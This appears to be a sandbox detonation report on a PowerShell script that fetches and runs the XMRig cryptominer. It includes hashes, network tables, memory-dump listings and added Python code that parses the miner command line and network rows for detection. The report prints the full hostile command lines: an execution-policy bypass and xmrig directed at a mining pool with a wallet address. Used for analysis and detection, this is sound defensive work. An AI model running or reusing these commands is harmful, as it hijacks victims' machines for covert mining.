memory/4776-94-0x00007FFBF1F00000-0x00007FFBF20DB000-memory.dmp

memory/224-95-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-96-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-97-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-98-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-99-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-100-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-101-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-102-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-103-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-104-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-105-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-106-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-107-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-108-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-109-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-110-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-111-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-112-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-113-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-114-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-115-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-116-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-117-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-118-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-119 through memory/224-155 (37 consecutive snapshots of the same region): 0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:40

Platform

win10v2004-20240226-en

Max time kernel

1794s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 rows exported with every field N/A (match details are not included in this export)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3996 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1388 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
GB 142.250.187.202:443 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 122.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 98.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.113.22.20.in-addr.arpa udp
US 8.8.8.8:53 206.221.208.4.in-addr.arpa udp
US 8.8.8.8:53 28.190.21.2.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 199.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 78.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 83.251.17.2.in-addr.arpa udp

Files

memory/4620-0-0x00007FFD84573000-0x00007FFD84575000-memory.dmp

memory/4620-9-0x0000020451060000-0x0000020451082000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fhgefuf1.3yr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4620-11-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4620-12-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4620-13-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4620-15-0x0000020451560000-0x0000020451572000-memory.dmp

memory/4620-16-0x0000020451540000-0x000002045154A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5504-47-0x0000026D394F0000-0x0000026D39510000-memory.dmp

memory/4620-48-0x00007FFD84573000-0x00007FFD84575000-memory.dmp

memory/4620-49-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/5504-51-0x0000026D39680000-0x0000026D396A0000-memory.dmp

memory/4620-50-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4620-52-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/5504-53-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-54-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-55-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-57-0x0000026D396C0000-0x0000026D396E0000-memory.dmp

memory/5504-56-0x0000026D396A0000-0x0000026D396C0000-memory.dmp

memory/5504-58-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-59-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-61-0x0000026D396C0000-0x0000026D396E0000-memory.dmp

memory/5504-60-0x0000026D396A0000-0x0000026D396C0000-memory.dmp

memory/5504-62 through memory/5504-119 (58 consecutive snapshots of the same region): 0x00007FF66B960000-0x00007FF66C593000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:51

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1788s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 rows exported with every field N/A (match details are not included in this export)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 94.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 59.170.16.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp

Files

memory/4780-3-0x00007FFC7A793000-0x00007FFC7A794000-memory.dmp

memory/4780-5-0x0000021B21800000-0x0000021B21822000-memory.dmp

memory/4780-7-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/4780-9-0x0000021B21B10000-0x0000021B21B86000-memory.dmp

memory/4780-10-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fnj3lggg.wtr.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4780-25-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/4780-48-0x0000021B21AB0000-0x0000021B21AC2000-memory.dmp

memory/4780-61-0x0000021B21870000-0x0000021B2187A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3100-90-0x000001FF5ECE0000-0x000001FF5ED00000-memory.dmp

memory/3100-91-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-92-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/4780-93-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/4780-94-0x00007FFC7A793000-0x00007FFC7A794000-memory.dmp

memory/4780-95-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/3100-96 through memory/3100-156 (61 consecutive snapshots of the same region): 0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:51

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
64 rows exported with every field N/A (match details are not included in this export)

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
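
The two command lines above (identical in behavioral25, behavioral30 and behavioral32 apart from the script's copy number) carry the whole story of this run: a PowerShell launch with the execution policy bypassed, then XMRig started from the same Temp directory with its pool, algorithm and wallet on the command line. The following Python is an added example, not part of the sandbox report and not XMRig's own code: it tokenizes the Windows command lines, maps the XMRig options seen here (-a, -o, -u, -p, plus the --opt=value spelling) to fields, splits the -u value using the unMineable COIN:ADDRESS.WORKER convention (an assumption based on the observed value), and lists the reasons a detection rule would fire. The threshold of three reasons for a "miner" verdict is arbitrary.

```python
"""Parse and score the miner launch chain recorded in the Processes tables.

Added example (not part of the sandbox report). It takes the two command lines
exactly as they appear above and turns them into structured indicators.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Command lines copied from the Processes sections of behavioral25/30/32.
POWERSHELL_CMD = (
    'powershell.exe -ExecutionPolicy bypass -File '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\file01 - copia (9).ps1"'
)
XMRIG_CMD = (
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" -a rx '
    '-o stratum+ssl://rx.unmineable.com:443 '
    '-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x'
)

# Bitcoin-style base58 alphabet used by Monero addresses (no 0, O, I, l).
_BASE58 = set("123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz")


def tokenize(cmd: str) -> list[str]:
    """Split a Windows command line: double quotes group, backslashes are literal."""
    return [q or bare for q, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


@dataclass
class MinerConfig:
    image: str
    algo: str | None = None
    pool_scheme: str | None = None
    pool_host: str | None = None
    pool_port: int | None = None
    coin: str | None = None
    address: str | None = None
    worker: str | None = None
    password: str | None = None
    flags: list[str] = field(default_factory=list)   # options we did not map


def parse_xmrig(cmd: str) -> MinerConfig:
    """Map the XMRig options seen in the report (-a, -o, -u, -p) to fields."""
    tokens = tokenize(cmd)
    cfg = MinerConfig(image=tokens[0])
    opts = {"-a": "algo", "--algo": "algo", "-o": "url", "--url": "url",
            "-u": "user", "--user": "user", "-p": "password", "--pass": "password"}
    values: dict[str, str] = {}
    i = 1
    while i < len(tokens):
        tok = tokens[i]
        if "=" in tok and tok.split("=", 1)[0] in opts:        # --url=... spelling
            key, val = tok.split("=", 1)
            values[opts[key]] = val
        elif tok in opts and i + 1 < len(tokens):              # -o value spelling
            values[opts[tok]] = tokens[i + 1]
            i += 1
        else:
            cfg.flags.append(tok)
        i += 1
    cfg.algo = values.get("algo")
    cfg.password = values.get("password")
    if "url" in values:
        u = urlsplit(values["url"])
        cfg.pool_scheme, cfg.pool_host, cfg.pool_port = u.scheme, u.hostname, u.port
    if "user" in values:
        # unMineable convention (assumed from the observed value): COIN:ADDRESS.WORKER[#ref]
        user = values["user"].split("#", 1)[0]
        coin, _, rest = user.partition(":")
        cfg.coin = coin if rest else None
        addr, _, worker = (rest or coin).partition(".")
        cfg.address, cfg.worker = addr, (worker or None)
    return cfg


def looks_like_monero_address(addr: str) -> bool:
    """Standard Monero address: 95 base58 chars, first char 4 (or 8 for a subaddress)."""
    return len(addr) == 95 and addr[0] in "48" and set(addr) <= _BASE58


def score(ps_cmd: str, miner_cmd: str) -> dict:
    """Collect the reasons this parent/child pair would fire in a detection rule."""
    ps = [t.lower() for t in tokenize(ps_cmd)]
    cfg = parse_xmrig(miner_cmd)
    reasons = []
    if "-executionpolicy" in ps and "bypass" in ps:
        reasons.append("powershell_executionpolicy_bypass")
    if "-file" in ps and "\\appdata\\local\\temp\\" in ps_cmd.lower():
        reasons.append("powershell_script_from_temp")
    if "\\appdata\\local\\temp\\" in cfg.image.lower():
        reasons.append("miner_image_in_temp")
    if cfg.pool_scheme and cfg.pool_scheme.startswith("stratum"):
        reasons.append("stratum_pool_url")
    if cfg.pool_port == 443 and cfg.pool_scheme != "https":
        reasons.append("non_https_on_443")        # pool traffic hidden behind a web port
    if cfg.algo == "rx":
        reasons.append("randomx_algo")
    if cfg.address and looks_like_monero_address(cfg.address):
        reasons.append("monero_wallet_in_cmdline")
    verdict = "miner" if len(reasons) >= 3 else "review"   # arbitrary threshold
    return {"config": cfg, "reasons": reasons, "verdict": verdict}


if __name__ == "__main__":
    result = score(POWERSHELL_CMD, XMRIG_CMD)
    print(result["verdict"], result["reasons"])
    print(result["config"])
```

The wallet address and worker name extracted this way are the most stable pivots for hunting: the pool host can change between campaigns while the payout address usually does not.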

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
IE 52.111.236.22:443 tcp
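
The Network tables of the three runs mix three kinds of rows: forward DNS to the sandbox resolver (8.8.8.8), reverse (in-addr.arpa) lookups that Windows issues for peers it has spoken to, and the TCP connections themselves. The Python below is an added example, not part of the report: it parses rows copied from the behavioral25 table (the richest of the three; the same code applies to behavioral30 and behavioral32), converts PTR names back to the IPs they name, and cross-checks them against the observed connections so that the IOCs (the pool host from the -o argument and the GitHub hosts contacted just before xmrig.exe appeared on disk) are separated from resolver noise. Treating the GitHub contacts as the payload download is an inference from ordering, not something the sandbox states, and the unattributed 142.250.187.202:443 row is left for manual review rather than assumed benign.

```python
"""Triage a sandbox Network table into resolver noise, reverse lookups and real
contacts, and cross-check PTR queries against the connections actually observed.

Added example, not part of the report. The rows below are copied from the
behavioral25 Network table; the classification rules are this example's own.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict
from dataclasses import dataclass

NETWORK_TABLE = """\
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
GB 142.250.187.202:443 tcp
"""

# Pool host taken from the xmrig -o argument in the Processes table.
POOL_HOSTS = {"rx.unmineable.com"}
# Hosts contacted right before xmrig.exe appeared on disk; treated as the payload
# download here, which is an inference from ordering rather than a sandbox finding.
STAGING_HOSTS = {"github.com", "objects.githubusercontent.com"}


@dataclass(frozen=True)
class Row:
    country: str
    ip: str
    port: int
    domain: str     # empty when the table has no domain column for the row
    proto: str


def parse_rows(table: str) -> list[Row]:
    """Parse 'Country Destination [Domain] Proto' rows; the domain is optional."""
    rows = []
    for line in table.splitlines():
        parts = line.split()
        if len(parts) == 3:
            country, dest, proto = parts
            domain = ""
        elif len(parts) == 4:
            country, dest, domain, proto = parts
        else:
            continue                       # header or blank line
        ip, _, port = dest.rpartition(":")
        rows.append(Row(country, ip, int(port), domain, proto))
    return rows


def ptr_to_ip(name: str) -> str | None:
    """'215.156.26.20.in-addr.arpa' -> '20.26.156.215'; None if not an IPv4 PTR name."""
    suffix = ".in-addr.arpa"
    if not name.endswith(suffix):
        return None
    octets = name[: -len(suffix)].split(".")
    if len(octets) != 4:
        return None
    try:
        return str(ipaddress.IPv4Address(".".join(reversed(octets))))
    except ipaddress.AddressValueError:
        return None


def classify(row: Row) -> str:
    if row.proto == "udp" and row.port == 53:
        return "ptr_lookup" if ptr_to_ip(row.domain) else "dns_query"
    if row.domain in POOL_HOSTS:
        return "mining_pool"
    if row.domain in STAGING_HOSTS:
        return "payload_staging"
    if not row.domain:
        return "unattributed"              # needs manual review, not assumed benign
    return "other"


def triage(table: str) -> dict:
    rows = parse_rows(table)
    buckets: dict[str, list[Row]] = defaultdict(list)
    for r in rows:
        buckets[classify(r)].append(r)
    connections = {r.ip for r in rows if r.proto == "tcp"}
    ptr_targets = {ptr_to_ip(r.domain) for r in buckets["ptr_lookup"]}
    iocs = {r.domain: r.ip for r in rows
            if r.proto == "tcp" and classify(r) in ("mining_pool", "payload_staging")}
    return {
        "buckets": {k: len(v) for k, v in buckets.items()},
        "iocs": iocs,
        # PTR queries for peers the run is recorded as having connected to
        "ptr_confirmed": ptr_targets & connections,
        # PTR queries with no recorded connection: another process, or outside the capture
        "ptr_unmatched": ptr_targets - connections,
        "unattributed_ips": sorted(r.ip for r in buckets["unattributed"]),
    }


if __name__ == "__main__":
    for key, value in triage(NETWORK_TABLE).items():
        print(f"{key}: {value}")
```

The PTR cross-check is worth keeping in any sandbox triage script: a reverse lookup whose target never appears as a connection (52.185.211.133 here) is a lead to chase in the full capture, not an IOC to block.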

Files

memory/948-0-0x00007FFDEFC33000-0x00007FFDEFC35000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5w2ie4kh.oay.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/948-9-0x0000023D54390000-0x0000023D543B2000-memory.dmp

memory/948-10-0x00007FFDEFC30000-0x00007FFDF06F2000-memory.dmp

memory/948-11-0x00007FFDEFC30000-0x00007FFDF06F2000-memory.dmp

memory/948-12-0x00007FFDEFC30000-0x00007FFDF06F2000-memory.dmp

memory/948-14-0x0000023D548A0000-0x0000023D548B2000-memory.dmp

memory/948-15-0x0000023D543D0000-0x0000023D543DA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/2460-46-0x0000018CB8D20000-0x0000018CB8D40000-memory.dmp

memory/2460-47-0x0000018CB8D70000-0x0000018CB8D90000-memory.dmp

memory/2460-48-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-52-0x0000018CB8DB0000-0x0000018CB8DD0000-memory.dmp

memory/2460-49-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-51-0x0000018CB8D90000-0x0000018CB8DB0000-memory.dmp

memory/948-50-0x00007FFDEFC30000-0x00007FFDF06F2000-memory.dmp

memory/948-53-0x00007FFDEFC33000-0x00007FFDEFC35000-memory.dmp

memory/948-54-0x00007FFDEFC30000-0x00007FFDF06F2000-memory.dmp

memory/2460-55-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-56-0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp

memory/2460-57-0x0000018CB8D90000-0x0000018CB8DB0000-memory.dmp

memory/2460-58-0x0000018CB8DB0000-0x0000018CB8DD0000-memory.dmp

memory/2460-59 through memory/2460-117 (59 consecutive snapshots of the same region): 0x00007FF7152C0000-0x00007FF715EF3000-memory.dmp